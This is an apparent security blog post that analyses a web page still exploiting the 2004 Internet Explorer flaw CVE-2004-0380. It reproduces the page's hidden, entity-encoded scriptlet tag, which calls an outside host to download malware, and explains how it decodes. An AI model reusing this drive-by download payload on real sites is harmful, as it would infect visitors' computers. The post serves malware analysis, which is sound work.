Marco Cova's Blog » Old exploit still kicking (CVE-2004-0380)

Feed

Tags

Old exploit still kicking (CVE-2004-0380)

October 9, 2009

Some exploits just do not want to go away.

Case in point is an exploit for CVE-2004-0380 (yes, 2004!) that I have recently found in hxxp://lixiaoxia.vhost008.cn/2.htm. The page is rather simple:

<html>
<OBJECT style="display:none;" type="text/x-scriptlet" 
  data="&#77&#75&#58&#64&#77&#83&#73&#84&#83&#116&#111&#114&#101&#58&#109
    &#104&#116&#109&#108&#58&#99&#58&#92&#46&#109&#104&#116&#33&#104&#116
    &#116&#112&#58&#47/http://lixiaoxia.vhost008.cn/logo.jpg ::/102%2E%68tm">
</OBJECT>
</body>
</html>

The object tag instantiates a scriptlet. A scriptlet is essentially a reusable object written as a regular web page in which scripts follow certain conventions. Think of ActiveX controls implemented in HTML and VB script. For the sake of historical completeness, scriptlets were introduced in Internet Explorer 4, deprecated in Internet Explorer 5, and disabled by default in Internet Explorer 7. Talk about a successful technology...

After a simple decoding step, the data attribute of the scriptlet reveals the content MK:@MSITStore:mhtml:c:\.mht!http://http://lixiaoxia.vhost008.cn/logo.jpg ::/102.htm, which, on a vulnerable system, would cause the malware logo.gif to be downloaded on the victim's computer.

The malware logo.gif has surprisingly good detection on VirusTotal (34/41!). I wonder if it is also been around since 2004...

Posted by marco in malware

To leave a comment, complete the form below. Mandatory fields are marked *.

marco

Menu:

Feed

Archives

Tags

Old exploit still kicking (CVE-2004-0380)